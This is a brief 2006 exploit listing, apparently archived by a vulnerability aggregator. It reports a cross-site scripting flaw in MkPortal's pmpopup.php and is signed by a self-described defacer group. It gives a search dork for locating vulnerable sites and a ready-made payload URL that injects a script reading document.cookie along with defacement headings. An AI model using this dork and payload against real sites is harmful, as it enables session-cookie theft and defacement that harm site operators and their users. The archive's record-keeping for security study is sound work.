Lucene search

K
securityvulnsSecurityvulnsSECURITYVULNS:DOC:14464
HistorySep 28, 2006 - 12:00 a.m.

MkPortal Cross Site Scripting (All versions) xSS

2006-09-2800:00:00
vulners.com
20

#By: HanowarS

#mail: vannovax[at]gmail.com

#Greetz: Nettoxic, Antrax, Fr34k, SSH-2, xarnuz

#web: www.div.com.ve and www.c-group.org

#ALL VERSIONS!!

Latin American Defacers

############################

Dork:

MKPortal M1.1 Rc1 ©2003-2005 All rights reserved

Hilo:

/mkportal/include/pmpopup.php?u1=www.c-group.org&m1=<script>alert(document.cookie)</script>&m2=<h1>h4x0r3d</h1>&m3=by&m4=<h1>HANOWARS</h1>

Affected File:

pmpopup.php

Example:

http://www.example.com/mkportal/include/pmpopup.php?u1=www.c-group.org&amp;m1=&lt;script&gt;alert&#40;document.cookie&#41;&lt;/script&gt;&amp;m2=&lt;h1&gt;h4x0r3d&lt;/h1&gt;&amp;m3=by&amp;m4=&lt;h1&gt;HANOWARS&lt;/h1&gt;